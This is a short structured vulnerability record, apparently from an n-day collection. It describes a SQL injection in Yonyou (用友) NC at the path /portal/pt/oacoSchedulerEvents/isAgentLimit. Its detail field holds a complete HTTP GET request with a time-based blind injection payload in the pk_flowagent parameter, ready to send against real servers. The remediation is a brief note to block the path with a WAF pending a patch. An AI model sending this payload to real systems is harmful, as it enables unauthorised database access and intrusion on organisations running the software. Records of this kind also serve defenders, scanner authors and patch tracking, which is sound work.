vendor = "用友"
name = "用友 NC oacoSchedulerEventsSQL 注入漏洞"
type = "SQL注入"
version = "未知"
path = "/portal/pt/oacoSchedulerEvents/isAgentLimit"
detail = "GET /portal/pt/oacoSchedulerEvents/isAgentLimit?pageId=login&pk_flowagent=1'waitfor+delay+'0:0:5'-- HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "nday"
